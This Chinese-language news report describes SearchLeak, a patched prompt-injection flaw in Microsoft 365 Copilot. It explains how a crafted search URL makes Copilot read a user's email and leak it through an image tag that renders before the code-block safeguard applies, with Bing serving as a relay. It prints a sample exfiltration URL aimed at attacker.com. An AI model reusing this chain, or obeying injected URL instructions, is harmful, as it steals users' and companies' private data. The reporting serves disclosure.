关键 Copilot 漏洞允许黑客窃取用户双因素认证代码

# 关键Copilot漏洞允许黑客窃取用户的两步验证码来源：https://arstechnica.com/security/2026/06/critical-copilot-vulnerability-allowed-hackers-to-seal-2fa-code-from-users/ 要实现"参数到提示注入"，攻击者会向目标发送一封包含URL的邮件，URL语法为 `https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=`。该字段包含一条指令。Copilot会欣然遵从。 "搜索功能正是攻击者所需要的，因为即便能力有限，只要用户有权访问关键信息就足够了，"研究人员在周一（https://www.varonis.com/blog/searchleak）的文章中写道。"为了窃取数据，攻击者精心构造一个URL，告诉Copilot‘搜索用户的电子邮件’，提取标题，并将其嵌入到一个图片URL中。" 受害者无需输入任何内容。他们只需点击一个链接，剩下的工作由Copilot完成。通常情况下，将输出包裹在代码块中的防护机制会生效。但研究人员发现，这种保护仅在"思考"阶段之后才会触发。在此之前，Copilot使用原始HTML生成响应，该响应会暂时在浏览器DOM中渲染。 研究人员写道： > 因此，流程如下： > 1. Copilot开始流式传输其响应，其中包含一个 `<img>` 标签 > 2. 浏览器看到该 `<img>` 标签，渲染它，并向src URL发送一个HTTP请求 > 3. Copilot完成生成。防护机制将所有内容包裹在 `<code>` 块中 > 4. 太晚了！请求已经发出。 研究人员现在能够从目标的浏览器中触发图片请求。如前所述，问题在于Copilot不会将图片请求发送到大多数网站。为了绕过这一防护，漏洞利用链使用了微软的必应搜索引擎作为某种跳板。根据Copilot的内容安全策略，必应是被允许发送此类请求的网站之一。然后，必应会将请求发送到请求中包含的攻击者控制的域名。 请求看起来像这样：`https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png` Varonis将这种攻击命名为SearchLeak。"由于SearchLeak针对的是微软的企业级服务，其影响范围不限于个人数据——它能够获取用户在企业内有权访问的任何内容，包括电子邮件、会议邀请和笔记，"公司研究人员写道。"SharePoint文档、OneDrive文件以及其他已索引的业务内容。根据M365与环境的连接方式，影响范围可能进一步扩大。" 如前所述，微软已于周二修复了SearchLeak所利用的漏洞。然而，由于没有已知的方法可以解决此类SNAFU问题的根本原因，攻击者必然会找到新的方法来绕过新构建的防护机制，而这一过程将再次重复。